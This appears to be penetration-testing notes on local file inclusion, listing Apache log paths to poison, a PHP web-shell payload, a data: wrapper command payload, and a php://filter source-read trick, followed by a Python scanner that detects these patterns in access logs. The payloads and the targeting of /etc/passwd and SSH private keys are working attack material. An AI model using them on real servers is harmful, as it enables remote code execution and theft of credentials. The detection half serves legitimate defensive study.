- Contaminating Log Files
- Enumerate users /etc/passwd
- Check for ssh keys /home/user/.ssh/id_rsa
- Check for RFI
Windows log files for contamination (Apache)
c:\xampp\apache\logs\access.log
c:\xampp\apache\logs\error.log
Linux log files for contamination (Apache)
/var/log/apache2/access.log
/var/log/apache2/error.log
PHP Contamination payload
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
PHP Wrappers payload
http://example.com/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
PHP Base64 Filter
php://filter/convert.base64-encode/resource=/var/www/html/admin.php
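
Detection side of the notes above, as an added example that is not part of the original notes: a scanner that flags Apache access.log lines carrying a PHP tag in a logged field, a php://filter or data: wrapper, or an include of the files listed above. It assumes the Apache "combined" log format; the rule names and the sample lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" format: host ident user [time] "request" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>.*?)" '
    r'\d{3} \S+ "(?P<referer>.*?)" "(?P<agent>.*?)"$'
)

# Rule names are this example's own labels; the patterns come from the notes above.
RULES = [
    ("php-tag", re.compile(r"<\?(php|=)", re.I)),
    ("php-wrapper", re.compile(r"php://filter|data:(//)?text/", re.I)),
    ("sensitive-file", re.compile(
        r"/etc/passwd|\.ssh/id_rsa|apache2?[/\\]+(logs[/\\]+)?(access|error)\.log", re.I)),
]

def decode(value, rounds=3):
    """Undo URL encoding, repeating to catch double-encoded input."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return [(rule, field), ...] for one access-log line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return []
    hits = []
    for field in ("request", "referer", "agent"):
        value = decode(m.group(field))
        hits += [(name, field) for name, rx in RULES if rx.search(value)]
    return hits

# Constructed sample lines (documentation IP addresses, not real traffic).
SAMPLE = [
    '203.0.113.5 - - [10/Mar/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php /* constructed marker */ ?>"',
    '203.0.113.9 - - [10/Mar/2024:10:00:03 +0000] "GET /menu.php?file=../../../../var/log/apache2/access.log HTTP/1.1" 200 900 "-" "curl/8.0"',
    '203.0.113.9 - - [10/Mar/2024:10:00:04 +0000] "GET /menu.php?file=php://filter/convert.base64-encode/resource=/var/www/html/admin.php HTTP/1.1" 200 700 "-" "curl/8.0"',
    '203.0.113.9 - - [10/Mar/2024:10:00:05 +0000] "GET /menu.php?file=data:text/plain,%3C%3Fphp%20echo%201%20%3F%3E HTTP/1.1" 200 30 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(line.split()[0], scan_line(line))
```

error.log uses a different line format, so it needs its own parser before the same rules can be applied to it.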